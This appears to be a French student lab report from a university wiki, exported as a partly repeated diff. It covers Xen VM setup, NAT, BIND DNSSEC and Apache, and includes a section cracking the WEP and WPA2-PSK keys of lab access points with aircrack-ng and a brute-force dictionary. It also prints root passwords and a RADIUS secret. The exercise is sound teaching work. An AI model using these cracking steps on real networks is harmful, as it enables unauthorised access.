---------------------<br />
Hostname : SE4.CachyOS<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:8B:45:EC<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:p+nECGSXOPvFjDjk+/x8adAn8JxTTPjuknCTcFZxJNk (DSA)<br />
SSH Fingerprint : SHA256:YaNMhK5ZFF/TshemMHSmt08R9uBPAnhNK134XEZ0CuY (ECDSA)<br />
SSH Fingerprint : SHA256:qQNuBNfAoySUPOFPplDh8p0ZPtxRulz/vbOq+Pm4gwM (ED25519)<br />
SSH Fingerprint : SHA256:psWV2TNuHsZcRelqipM7TJ/mE4cvFI+oxndg6nvCpCk (RSA)<br />
Root Password : 6nyCiterydiMtnxsPDRsUys<br />
<br />
</syntaxhighlight>Manjaro : <syntaxhighlight lang="shell"><br />
<br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.Manjaro<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:36:79:D8<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:n+ojtWyKBODRtEppjCvAp6nd2cjL/Ily54j0cM03lMc (DSA)<br />
SSH Fingerprint : SHA256:K+Qa9NAU3JIGsMy3LEYCgFbfL3ozuiRKG+U3XsbV5ow (ECDSA)<br />
SSH Fingerprint : SHA256:AJLfxk4Zz8BZflWYOS8mifapH+uAFgGKA3WSj6rN0NA (ED25519)<br />
SSH Fingerprint : SHA256:/6iWOWoii0nJsbScwVYIGQAbuTI1/YIpaRyRdBl8mwE (RSA)<br />
Root Password : PgvMbhYvgtksg8tmiJnVZnQ<br />
</syntaxhighlight>LinusTorvalds :<syntaxhighlight lang="shell"><br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.LinusTorvalds<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:AA:BF:EF<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:ouY/2dce0YI/mJD9Qw68oKU0xdw6Cs9ybgJxRm/FKiI (DSA)<br />
SSH Fingerprint : SHA256:p5lZznE0q8j6c68YTF5toYgBugOkc0IopTO+Ce9SiZ8 (ECDSA)<br />
SSH Fingerprint : SHA256:FbqBOG+0bBjuQBOlAytAlbMV/9VoJ8BAlFadG/VaGD4 (ED25519)<br />
SSH Fingerprint : SHA256:FCEtQGUhMhN9DDtTmt5zts/9PeC7ahnmJA7UOhMnGeg (RSA)<br />
Root Password : ekrmCSKb3ZAxXSYvNpjbiSK<br />
</syntaxhighlight><br />
<br />
==== Etape 4 : ====<br />
PHRASE MANQUANTE<syntaxhighlight lang="shell"><br />
xen create /etc/xen/SE4.Manjaro.cfg<br />
xen create /etc/xen/SE4.CachyOS.cfg<br />
xen create /etc/xen/SE4.LinusTorvalds.cfg<br />
</syntaxhighlight>On vérifie la liste des machines lancées via : <syntaxhighlight lang="shell"><br />
xen list<br />
</syntaxhighlight><br />
<br />
===== Nos résultats : =====<br />
<syntaxhighlight lang="shell"><br />
Name ID Mem VCPUs State Time(s)<br />
SE4.CachyOS 83 2048 1 -b---- 5.6<br />
SE4.Manjaro 85 2048 1 -b---- 5.8<br />
SE4.LinusTorvalds 87 2048 1 -b---- 5.3<br />
</syntaxhighlight><br />
<br />
==== Etape 5 : Partition ====<br />
<br />
===== Sur capbreton =====<br />
<br />
On partionne avec cette commande :<syntaxhighlight lang="shell"><br />
lvcreate -n SE4.CachyOS.var -L 10G virtual<br />
</syntaxhighlight><br />
On éteint notre machine : <syntaxhighlight lang="shell"><br />
xen shutdown SE4.CachyOS<br />
</syntaxhighlight><br />
Et on modifie :<syntaxhighlight lang="shell"><br />
vim /etc/xen/SE4.CachyOS.cfg<br />
</syntaxhighlight><br />
<br />
Et on ajoute ceci :<syntaxhighlight lang="shell"><br />
disk = [<br />
[...],<br />
'phy:/dev/virtual/SE4.CachyOS.home,xvda3,w',<br />
'phy:/dev/virtual/SE4.CachyOS.var,xvdb1,w'<br />
]<br />
</syntaxhighlight><br />
<br />
===== Sur la machine mandataire =====<br />
<br />
Nous ajoutons les partitions dans '''''/etc/fstab''''' : <syntaxhighlight lang="shell"><br />
/dev/xvda3 /var ext4 defaults 0 2<br />
/dev/xvdb1 /home ext4 defaults 0 2<br />
</syntaxhighlight><br />
<br />
Nous formatons les partitions avant de les utiliser : <syntaxhighlight lang="shell"><br />
mkfs -t ext4 /dev/xvda3<br />
mkfs -t ext4 /dev/xvdb1<br />
</syntaxhighlight><br />
<br />
Nous copions le contenu de '''/var''' : <syntaxhighlight lang="shell"><br />
mount /dev/xvda3 /mnt<br />
mv /var/* /mnt<br />
umount /mnt<br />
</syntaxhighlight><br />
<br />
Nous montons ensuite automatiquement les partitions définies dans '''/etc/fstab''' : <syntaxhighlight lang="shell"><br />
mount -a<br />
</syntaxhighlight><br />
<br />
===== De nouveaux sur capbreton =====<br />
On redémarre notre machine : <syntaxhighlight lang="shell"><br />
xen create /etc/xen/SE4.CachyOS.cfg<br />
</syntaxhighlight><br />
<br />
Ensuite on se connecte à notre VM via :<syntaxhighlight lang="shell"><br />
xen console SE4.CachyOS<br />
</syntaxhighlight><br />
<br />
===== Machines de Service - CachyOS & Manjaro =====<br />
Dans notre VM :<br />
<br />
On modifie :<syntaxhighlight lang="shell"><br />
vim /etc/network/interfaces<br />
</syntaxhighlight><br />
Et on ajoute ceci :<syntaxhighlight lang="shell"><br />
auto lo<br />
iface lo inet loopback<br />
<br />
auto eth0<br />
iface eth0 inet static<br />
address 192.168.10.3/24<br />
gateway 192.168.10.1<br />
<br />
# Pour l'ipv6<br />
auto eth1<br />
iface eth1 inet6 auto<br />
<br />
</syntaxhighlight><br />
<br />
* 172.60.0.3 est l'adresse IPV4 de la VM CachyOS<br />
<br />
===== Machine Mandataire - LinusTorvalds =====<br />
La machine mandataire agit comme passerelle IPv4 pour les machines de services. Voici sa configuration réseau :<br />
<br />
La machine mandataire va posséder trois adresses. Une adresse IPv6 routée, une adresse IPv4 routée et une adresse IPv4 pour le réseau privé avec ces deux machines de services. Pour ce faire, nous devons au préalable configurer une nouvelle interface eth1 pour y intégrer la seconde adresse IPv4.<br />
<br />
Sur capbreton, depuis <code>/etc/xen/SE4.CachyOS.cfg :</code><syntaxhighlight lang="shell"><br />
vif = [[...], 'mac=00:16:3E:8B:45:ED,bridge=SE4']<br />
</syntaxhighlight>Pour l'adresse mac on prend celui existant et on fait +1.<br />
<br />
Depuis <code>/etc/resolv.conf </code>:<syntaxhighlight lang="shell"><br />
nameserver 8.8.8.8<br />
<br />
</syntaxhighlight><br />
<br />
==== SSH 476 ssh -oKexAlgorithms=+diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes128-cbc admin@172.27.0.3 ====<br />
<syntaxhighlight lang="shell"><br />
apt update<br />
apt upgrade<br />
<br />
apt install ssh<br />
apt install bind9<br />
apt install apache2<br />
</syntaxhighlight>(Dans TOUTES les VMs)<br />
<br />
On active le SSH en ajoutant dans <code>/etc/ssh/sshd_config</code> :<syntaxhighlight lang="shell"><br />
PermitRootLogin yes<br />
</syntaxhighlight>Pour redemarrer le service ssh :<syntaxhighlight lang="shell"><br />
/etc/init.d/ssh restart<br />
</syntaxhighlight>Pour la machine mandataire, ensuite après avoir reboot on peut faire dans nos machines de services :<syntaxhighlight lang="shell"><br />
iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.10.0/24<br />
</syntaxhighlight> <br />
<br />
==== Mascarade ====<br />
Sur la mandataire : <syntaxhighlight lang="shell"><br />
iptables -t nat -A PREROUTING -p tcp --dport 2202 -j DNAT --to-destination 192.168.10.3:22<br />
iptables-save<br />
<br />
</syntaxhighlight>Et on décommente cette ligne dans <code>/etc/sysctl.conf</code> : <syntaxhighlight lang="shell"><br />
net.ipv4.ip_forward=1<br />
</syntaxhighlight>Et maintenant nous pouvons nous connecter à notre machine de service en ssh : <syntaxhighlight lang="shell"><br />
#IPV4<br />
ssh root@193.48.57.166 -p 2202<br />
# IPV6<br />
ssh root@2001:660:4401:60a0:216:3eff:fe8b:45ed<br />
</syntaxhighlight><br />
<br />
==== DNS ====<br />
Tout d'abord, il faut modifier <code>/etc/bind/named.conf.local</code> : <syntaxhighlight lang="shell"><br />
zone "archlinuxbtw.lol" {<br />
type master;<br />
file "/etc/bind/myZones/db.archlinuxbtw.lol";<br />
allow-transfer{secondaries;};<br />
notify yes;<br />
};<br />
<br />
acl "secondaries"{<br />
192.168.10.2;<br />
2001:660:4401:60a0:216:3eff:fe36:79d9;<br />
};<br />
<br />
zone "archlinux.lol" {<br />
type secondary;<br />
file "/etc/bind/backup/db.archlinux.lol";<br />
primaries{2001:660:4401:60a0:216:3eff:fe36:79d9;};<br />
};<br />
<br />
</syntaxhighlight>J'ai ensuite créée un dossier myZones puis j'ai créer db.archlinuxbtw.lol et j'y ai ajouter :<syntaxhighlight lang="shell"><br />
$TTL 400<br />
<br />
@ IN SOA ns.archlinuxbtw.lol admin.archlinuxbtw.lol (<br />
3609 ; Numero de version<br />
21600 ; Rafraichissement (6h)<br />
3600 ; Re-tentative (1h)<br />
2592000 ; Expiration (30j)<br />
86400 ; Cache negatif (24h)<br />
);<br />
<br />
IN NS ns.archlinuxbtw.lol.<br />
IN NS ns.archlinux.lol.<br />
@ IN A 193.48.57.166<br />
@ IN AAAA 2001:660:4401:60a0:216:3eff:fe8b:45ed<br />
ns IN A 193.48.57.166<br />
ns IN AAAA 2001:660:4401:60a0:216:3eff:fe8b:45ed<br />
<br />
www IN CNAME archlinuxbtw.lol<br />
<br />
</syntaxhighlight>Ensuite on restart le service via : <code>service named restart</code><br />
<br />
<br />
Création d'une clé<syntaxhighlight lang="shell"><br />
openssl req -nodes -newkey rsa:2048 -sha256 -keyout archlinuxbtw.lol.key -out archlinuxbtw.csr<br />
</syntaxhighlight><br />
[[Fichier:DNS Check.png|centré|vignette|452x452px|DNS Checker ]]<br />
Notre DNS est bien reconnu et la commande <code>dig @8.8.8.8 archlinuxbtw.lol</code> c'est grâce au Glue records.<br />
<br />
<br />
Génération des clés<br />
<br />
<br />
Changement nom machine <code>nano /etc/hostname : CachyOS</code><br />
<br />
Et dans /etc/hosts:<br />
<br />
127.0.1.1 archlinuxbtw.lol SE4.CachyOS<br />
<br />
==== DNSSEC ====<br />
Afin de protéger notre DNS contre des possibles attaques nous utiliserons DNSSEC. Ici nous utiliserons la politique DNSSEC : <code>"dnspol"</code><br />
Ensuite on crée le dossier keys et on donne les droits a bind d'écrire dedans avec :<syntaxhighlight lang="shell"><br />
mkdir /etc/bind/keys <br />
chown bind:bind /etc/bind/keys <br />
chmod 750 /etc/bind/keys<br />
</syntaxhighlight>Pour ce faire, dans <code>named.conf.local</code> il faut rajouter les 3 lignes à partir de "key-directory" :<syntaxhighlight lang="shell"><br />
key-directory "/etc/bind/keys";<br />
dnssec-policy "dnspol"; // DNSSEC automatique<br />
inline-signing yes;<br />
<br />
[...]<br />
<br />
dnssec-policy "dnspol" {<br />
keys {<br />
ksk key-directory lifetime unlimited algorithm 13;<br />
zsk key-directory lifetime unlimited algorithm 13;<br />
};<br />
nsec3param;<br />
};<br />
<br />
</syntaxhighlight>Pour l'activer, il faut restart bind9 avec <code>systemctl restart bind9</code><br />
<br />
Il ne reste qu'à ajouter la clé KSK sur Gandi et ensite on peut voir s'il fonctionne bien grace au site suivant : <nowiki>https://dnsviz.net</nowiki><br />
[[Fichier:DNSSec.png|centré|vignette|DNSSec]]<br />
<br />
<br />
Et on peut voir que nos clefs on bien été générer : <syntaxhighlight lang="shell"><br />
root@CachyOS:/etc/bind# ls keys/<br />
Karchlinuxbtw.lol.+013+24458.key Karchlinuxbtw.lol.+013+56682.key<br />
Karchlinuxbtw.lol.+013+24458.private Karchlinuxbtw.lol.+013+56682.private<br />
Karchlinuxbtw.lol.+013+24458.state Karchlinuxbtw.lol.+013+56682.state<br />
<br />
</syntaxhighlight><br />
<br />
==== Apache ====<br />
Dans ce repertoire <code>/etc/apache2/sites-availab</code>le : touch archlinuxbtw.lol.conf <br />
<br />
<br />
Je genere un crt via la commande : <br />
<br />
openssl x509 -req -days 365 -in archlinuxbtw.csr -signkey archlinuxb<br />
<br />
tw.lol.key -out archlinuxbtw.lol.crt<br />
<br />
<br />
Et je deplace mes fichiers dans : <br />
<br />
root@CachyOS:~# mv archlinuxbtw.lol.crt /etc/ssl/certs/ <br />
<br />
root@CachyOS:~# mv archlinuxbtw.lol.key /etc/ssl/private/ <br />
<br />
root@CachyOS:~# chmod 600 /etc/ssl/private/archlinuxbtw.lol.key<br />
<br />
Pour arreter le service par defaut : a2dissite 000-default.conf <br />
<br />
Et on verifie avec la commande : apache2ctl -S<br />
<br />
Iptable pour atteindres les ports https : <code># HTTP iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 192.168.10.3:80 # HTTPS iptables -t nat -A PREROUTING -p tcp --dport 443 -j DNAT --to-destination 192.168.10.3:443 iptables-save</code><br />
<br />
<br />
iptables -A FORWARD -p tcp -d 192.168.10.3 --dport 80 -j ACCEPT<br />
<br />
iptables -A FORWARD -p tcp -d 192.168.10.3 --dport 443 -j ACCEPT<br />
==== Effraction WiFi ====<br />
<br />
===== Cassage WEP =====<br />
Il faut tout faire sur la zabeth13 comme on avait tester sur 4 machines dans la semaine avec mon binome les cartes réseaux des autres machines ne marchent pas. <br />
<br />
Avec ip link je vois que l'interface wifi se nomme <code>wlx40a5ef0f679b</code>.<br />
<br />
On peut alors recuperer le bssid de notre réseau wifi a crack. Je suis le numéro 5 donc je dois crack la cracotte05 : <br />
<br />
<code>sudo airodump-ng wlx40a5ef0f679b</code><br />
<br />
<br />
Je recupere :<br />
<br />
<code>BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID</code><br />
<br />
<code>04:DA:D2:9C:50:54 -63 27 5 0 4 54e. WEP WEP cracotte05</code> <br />
<br />
Je peux alors dump correctement en filtrant seulement le bon bssid et le bon channel via cette commande : <br />
<br />
<code>sudo airodump-ng wlx40a5ef0f679b --write airodump --bssid 04:DA:D2:9C:50:54 -c4</code><br />
<br />
Et en parallele on lance ceci jusqu'a ce que la clef soit trouvé :<br />
<br />
<code>aircrack-ng airodump-01.cap</code><syntaxhighlight lang="shell"><br />
Aircrack-ng 1.7 <br />
<br />
<br />
[00:26:11] Tested 835 keys (got 68980 IVs)<br />
Got 70001 out of 70000 IVsStarting PTW attack with 70001 ivs.<br />
KB depth byte(vote)<br />
0 0/ 13 FF(97024) A3(79616) D9(79360) C5(78848) 3A(78592) E3(78592) 29(78336) D1(78336) E9(78080) 7C(77568) DF(77568) 34(76800) 85(76800) D8(76544) 24(76032) <br />
1 0/ 1 CA(108544) CB(80128) B5(79104) EB(78336) 10(77824) A8(77312) E5(76800) F8(76800) E7(76544) EE(76544) 27(76288) 4C(76288) 68(76288) CC(76288) E6(76288) <br />
2 2/ 2 A4(80128) 3A(78336) 14(76800) 5A(76544) D2(76544) 98(76032) 08(75776) 1D(75776) 40(75776) 99(75776) E4(75776) F2(75776) CD(75520) F7(75520) 56(75008) <br />
3 0/ 1 D1(100608) 89(79872) 22(77568) 11(77056) A0(77056) 9E(76800) B0(76800) 98(76544) A9(76544) 5A(76032) AB(76032) CD(76032) 9A(75776) 4D(75520) 51(75264) <br />
4 7/ 4 43(77312) 4E(76800) 0F(76544) 29(76544) BA(76544) 3E(76032) 61(75776) A6(75776) C6(75776) 89(75264) 21(75008) 5A(75008) 65(75008) C8(75008) DD(75008) <br />
<br />
KEY FOUND! [ FF:FF:FF:FF:FA:BC:06:CB:AE:EE:EE:EE:EE ] <br />
Decrypted correctly: 100%<br />
<br />
<br />
</syntaxhighlight><br />
<br />
===== Cassage WPA-PKS =====<br />
Ce script python permet de creer un dictionnaire :<syntaxhighlight lang="python"><br />
with open("dictionnaire_8_chiffres.txt", "w") as f:<br />
for i in range(100000000): # Pour générer des nombres de 00000000 à 99999999<br />
f.write(f"{i:08d}\n") # Écrit le nombre avec 8 chiffres<br />
<br />
</syntaxhighlight>ou alors avec crunch :<br />
<br />
<code>crunch 8 8 0123456789 -o dictionnaire_8_chiffres.txt</code><br />
<br />
Ensuite après execution nous pouvons recuperer le fichier .txt créer.<br />
<br />
On récuperer le dump comme precedemment pour cette borne pour mon cas :<br />
<br />
<code>BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID</code><br />
<br />
<code>44:AD:D9:5F:87:04 -43 3 5 2 13 54e. WPA2 CCMP PSK kracotte05</code> <br />
<br />
Je peux alors dump correctement en filtrant seulement le bon bssid et le bon channel via cette commande :<code>sudo airodump-ng wlx40a5ef0f679b --write airodumpWPA --bssid 44:AD:D9:5F:87:04 -c13</code><br />
<br />
Et ensuite après avoir récuperer 1 data minimum :<br />
<br />
<code>aircrack-ng airodump-01.cap</code><br />
<br />
<br />
Et enfin on attend (c'est long si vous vous demander... tres looong faite la suite en attendant :<syntaxhighlight lang="bash"><br />
Aircrack-ng 1.7 <br />
<br />
[00:35:36] 66631280/100000000 keys tested (30842.35 k/s) <br />
<br />
Time left: 18 minutes, 1 second 66.63%<br />
<br />
KEY FOUND! [ 66685666 ]<br />
<br />
<br />
Master Key : EF 69 DE 33 B4 7F AA 9E 20 AB 3C AF F1 F7 3E A8 <br />
61 7C 80 F2 3C A9 FE B6 9A 72 98 B3 20 B3 2A A6 <br />
<br />
Transient Key : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 <br />
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 <br />
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 <br />
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 <br />
<br />
EAPOL HMAC : AD 95 F2 4D 5A 3F 4A 57 CD D8 0E EA A6 14 8B 1A <br />
<br />
<br />
</syntaxhighlight><br />
<br />
==== Sécurisation WiFi par WPA2-EAP ====<br />
Depuis notre machine de service on va se connecter sur notre borne wifi, ici on prend l'IP de la E304 :<br />
<br />
<code>ssh -oKexAlgorithms=+diffie-hellman-group11-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes128-cbc admin@172.27.0.4</code><br />
<br />
<syntaxhighlight lang="bash"><br />
conf t<br />
<br />
aaa new-model<br />
aaa authentication login eap_student5 group radius_student5<br />
radius-server host 192.168.10.3 auth-port 1812 acct-port 1813 key secret_student5 <br />
aaa group server radius radius_student5 <br />
server 192.168.10.3 auth-port 1812 acct-port 1813 <br />
exit<br />
<br />
dot11 ssid VM_SERVICES_5 <br />
vlan 15 <br />
authentication open eap eap_student5 <br />
authentication network-eap eap_student5<br />
authentication key-management wpa<br />
mbssid guest-mode<br />
exit<br />
<br />
interface Dot11Radio0<br />
encryption vlan 15 mode ciphers aes-ccm <br />
exit<br />
<br />
interface Dot11Radio0.15<br />
encapsulation dot1Q 15<br />
bridge-group 15<br />
exit<br />
<br />
interface GigabitEthernet0.15<br />
encapsulation dot1Q 15<br />
bridge-group 15<br />
exit<br />
<br />
interface Dot11Radio0<br />
ssid VM_SERVICES_5<br />
exit<br />
<br />
<br />
</syntaxhighlight><br />
<br />
<br />
<br />
et l'IP de la E305 :<br />
<br />
<code>ssh -oKexAlgorithms=+diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes128-cbc admin@172.27.0.3</code><br />
<br />
<br />
Et ensuite sur le routeur :<syntaxhighlight lang="shell"><br />
conf t<br />
<br />
ip dhcp pool PoolCedric<br />
network 10.60.5.0 255.255.255.0<br />
dns-server 193.48.57.166<br />
default-router 10.60.5.254<br />
exit<br />
<br />
exit<br />
write<br />
</syntaxhighlight><syntaxhighlight lang="shell"><br />
interface Vlan15<br />
description "VLAN personnel de Cedric PAYET (E5) - WPA2-EAP"<br />
ip address 10.60.5.2 255.255.255.0<br />
ipv6 address 2001:660:4401:60a5::2/64<br />
vrrp 15 address-family ipv4<br />
priority 110<br />
address 10.60.5.1 primary<br />
exit-vrrp<br />
end<br />
<br />
</syntaxhighlight><syntaxhighlight lang="shell"><br />
conf t<br />
vlan 15<br />
name E5-Cedric<br />
exit<br />
exit<br />
write<br />
</syntaxhighlight><syntaxhighlight lang="shell"><br />
wifi-E306(config)#interface GigabitEthernet0.15<br />
wifi-E306(config-subif)#encapsulation dot1Q 15<br />
wifi-E306(config-subif)#bridge-group 15<br />
wifi-E306(config-subif)#bridge-group 15 spanning-disabled<br />
wifi-E306(config-subif)#no bridge-group 15 source-learning<br />
wifi-E306(config-subif)#exit<br />
wifi-E306(config)#exit<br />
<br />
</syntaxhighlight><br />
<br />
=== Utiles ===<br />
<br />
=== XEN ===<br />
''<u>Liste des VMs allumées :</u>'' <syntaxhighlight lang="shell"><br />
xen list<br />
</syntaxhighlight><br />
<br />
''<u>Se connecter à la VM :</u>''<syntaxhighlight lang="shell"><br />
xen console <nomMachine><br />
</syntaxhighlight>nomMachine : dans notre cas soit SE4.Manjaro | SE4.CachyOS | SE4.LinusTorvalds<br />
''<u>Sortir de la console xen :</u>''<syntaxhighlight lang="shell"><br />
Ctrl + Shift + 5<br />
</syntaxhighlight>''<u>Eteindre une VM :</u>'' <syntaxhighlight lang="shell"><br />
xen shutdown <nomMachine><br />
</syntaxhighlight>nomMachine : dans notre cas soit SE4.Manjaro | SE4.CachyOS | SE4.LinusTorvalds<br />
<br />
''<u>Allumer une VM :</u>''<syntaxhighlight lang="shell"><br />
xen create /etc/xen/<nomMachine>.cfg<br />
</syntaxhighlight></div>
Cpayet
https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E5&diff=12211
Atelier SysRes SE4 2025/2026 E5
2026-02-10T16:48:37Z
<p>Cpayet : /* Etape 2 : Créer un fichier dans le répertoire /etc/network/interfaces.d du Dom0 aux noms du binôme concerné */</p>
<hr />
<div>=== Compte rendu des commandes effectués ===<br />
<br />
==== Etape 1 : Connexion SSH ====<br />
ssh root@capbreton<br />
<br />
Mot de passe : <br />
<br />
==== Etape 2 : Créer un fichier dans le répertoire /etc/network/interfaces.d du Dom0 aux noms du binôme concerné ====<br />
On se déplace à ce répertoire :<syntaxhighlight lang="shell"><br />
cd /etc/network/interfaces.d/<br />
</syntaxhighlight>On créer ensuite ensuite un fichier aux noms de notre binôme et on l'édite :<syntaxhighlight lang="shell"><br />
touch SE42026_cpayet_tdelobel<br />
vim SE42026_cpayet_tdelobel<br />
<br />
</syntaxhighlight>Puis on donne un nom au bridge, ici c'est `pont_pacman`et on met dans le fichier ceci :<syntaxhighlight lang="shell"><br />
auto pont_pacman<br />
iface pont_pacman inet manual<br />
bridge_ports none<br />
up ip link set $IFACE up<br />
down ip link set $IFACE down<br />
</syntaxhighlight>Une fois le pont créer, il faut le démarrer :<syntaxhighlight lang="shell"><br />
ifup pont_pacman<br />
</syntaxhighlight><br />
<br />
==== Etape 3 : Création des VMs ====<br />
<syntaxhighlight lang="shell"><br />
xen-create-image --hostname=SE4.CachyOS --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
xen-create-image --hostname=SE4.Manjaro --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
xen-create-image --hostname=SE4.LinusTorvalds --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
</syntaxhighlight>On adapte les hostnames en fonction des nom de nos machines. <br />
<br />
'''''IMPORTANT :''''' Les résultats des commandes sont à noter car ellles contiennent les mots de passe et autres informations importantes.<br />
<br />
===== Nos résultats : =====<br />
CachyOS : <syntaxhighlight lang="shell"><br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.CachyOS<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:8B:45:EC<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:p+nECGSXOPvFjDjk+/x8adAn8JxTTPjuknCTcFZxJNk (DSA)<br />
SSH Fingerprint : SHA256:YaNMhK5ZFF/TshemMHSmt08R9uBPAnhNK134XEZ0CuY (ECDSA)<br />
SSH Fingerprint : SHA256:qQNuBNfAoySUPOFPplDh8p0ZPtxRulz/vbOq+Pm4gwM (ED25519)<br />
SSH Fingerprint : SHA256:psWV2TNuHsZcRelqipM7TJ/mE4cvFI+oxndg6nvCpCk (RSA)<br />
Root Password : 6nyCiterydiMtnxsPDRsUys<br />
<br />
</syntaxhighlight>Manjaro : <syntaxhighlight lang="shell"><br />
<br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.Manjaro<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:36:79:D8<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:n+ojtWyKBODRtEppjCvAp6nd2cjL/Ily54j0cM03lMc (DSA)<br />
SSH Fingerprint : SHA256:K+Qa9NAU3JIGsMy3LEYCgFbfL3ozuiRKG+U3XsbV5ow (ECDSA)<br />
SSH Fingerprint : SHA256:AJLfxk4Zz8BZflWYOS8mifapH+uAFgGKA3WSj6rN0NA (ED25519)<br />
SSH Fingerprint : SHA256:/6iWOWoii0nJsbScwVYIGQAbuTI1/YIpaRyRdBl8mwE (RSA)<br />
Root Password : PgvMbhYvgtksg8tmiJnVZnQ<br />
</syntaxhighlight>LinusTorvalds :<syntaxhighlight lang="shell"><br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.LinusTorvalds<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:AA:BF:EF<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:ouY/2dce0YI/mJD9Qw68oKU0xdw6Cs9ybgJxRm/FKiI (DSA)<br />
SSH Fingerprint : SHA256:p5lZznE0q8j6c68YTF5toYgBugOkc0IopTO+Ce9SiZ8 (ECDSA)<br />
SSH Fingerprint : SHA256:FbqBOG+0bBjuQBOlAytAlbMV/9VoJ8BAlFadG/VaGD4 (ED25519)<br />
SSH Fingerprint : SHA256:FCEtQGUhMhN9DDtTmt5zts/9PeC7ahnmJA7UOhMnGeg (RSA)<br />
Root Password : ekrmCSKb3ZAxXSYvNpjbiSK<br />
</syntaxhighlight><br />
<br />
==== Etape 4 : ====<br />
PHRASE MANQUANTE<syntaxhighlight lang="shell"><br />
xen create /etc/xen/SE4.Manjaro.cfg<br />
xen create /etc/xen/SE4.CachyOS.cfg<br />
xen create /etc/xen/SE4.LinusTorvalds.cfg<br />
</syntaxhighlight>On vérifie la liste des machines lancées via : <syntaxhighlight lang="shell"><br />
xen list<br />
</syntaxhighlight><br />
<br />
===== Nos résultats : =====<br />
<syntaxhighlight lang="shell"><br />
Name ID Mem VCPUs State Time(s)<br />
SE4.CachyOS 83 2048 1 -b---- 5.6<br />
SE4.Manjaro 85 2048 1 -b---- 5.8<br />
SE4.LinusTorvalds 87 2048 1 -b---- 5.3<br />
</syntaxhighlight><br />
<br />
==== Etape 5 : Partition ====<br />
<br />
===== Sur capbreton =====<br />
<br />
On partionne avec cette commande :<syntaxhighlight lang="shell"><br />
lvcreate -n SE4.CachyOS.var -L 10G virtual<br />
</syntaxhighlight><br />
On éteint notre machine : <syntaxhighlight lang="shell"><br />
xen shutdown SE4.CachyOS<br />
</syntaxhighlight><br />
Et on modifie :<syntaxhighlight lang="shell"><br />
vim /etc/xen/SE4.CachyOS.cfg<br />
</syntaxhighlight><br />
<br />
Et on ajoute ceci :<syntaxhighlight lang="shell"><br />
disk = [<br />
[...],<br />
'phy:/dev/virtual/SE4.CachyOS.home,xvda3,w',<br />
'phy:/dev/virtual/SE4.CachyOS.var,xvdb1,w'<br />
]<br />
</syntaxhighlight><br />
<br />
===== Sur la machine mandataire =====<br />
<br />
Nous ajoutons les partitions dans '''''/etc/fstab''''' : <syntaxhighlight lang="shell"><br />
/dev/xvda3 /var ext4 defaults 0 2<br />
/dev/xvdb1 /home ext4 defaults 0 2<br />
</syntaxhighlight><br />
<br />
Nous formatons les partitions avant de les utiliser : <syntaxhighlight lang="shell"><br />
mkfs -t ext4 /dev/xvda3<br />
mkfs -t ext4 /dev/xvdb1<br />
</syntaxhighlight><br />
<br />
Nous copions le contenu de '''/var''' : <syntaxhighlight lang="shell"><br />
mount /dev/xvda3 /mnt<br />
mv /var/* /mnt<br />
umount /mnt<br />
</syntaxhighlight><br />
<br />
Nous montons ensuite automatiquement les partitions définies dans '''/etc/fstab''' : <syntaxhighlight lang="shell"><br />
mount -a<br />
</syntaxhighlight><br />
<br />
===== De nouveaux sur capbreton =====<br />
On redémarre notre machine : <syntaxhighlight lang="shell"><br />
xen create /etc/xen/SE4.CachyOS.cfg<br />
</syntaxhighlight><br />
<br />
Ensuite on se connecte à notre VM via :<syntaxhighlight lang="shell"><br />
xen console SE4.CachyOS<br />
</syntaxhighlight><br />
<br />
===== Machines de Service - CachyOS & Manjaro =====<br />
Dans notre VM :<br />
<br />
On modifie :<syntaxhighlight lang="shell"><br />
vim /etc/network/interfaces<br />
</syntaxhighlight><br />
Et on ajoute ceci :<syntaxhighlight lang="shell"><br />
auto lo<br />
iface lo inet loopback<br />
<br />
auto eth0<br />
iface eth0 inet static<br />
address 192.168.10.3/24<br />
gateway 192.168.10.1<br />
<br />
# Pour l'ipv6<br />
auto eth1<br />
iface eth1 inet6 auto<br />
<br />
</syntaxhighlight><br />
<br />
* 172.60.0.3 est l'adresse IPV4 de la VM CachyOS<br />
<br />
===== Machine Mandataire - LinusTorvalds =====<br />
La machine mandataire agit comme passerelle IPv4 pour les machines de services. Voici sa configuration réseau :<br />
<br />
La machine mandataire va posséder trois adresses. Une adresse IPv6 routée, une adresse IPv4 routée et une adresse IPv4 pour le réseau privé avec ces deux machines de services. Pour ce faire, nous devons au préalable configurer une nouvelle interface eth1 pour y intégrer la seconde adresse IPv4.<br />
<br />
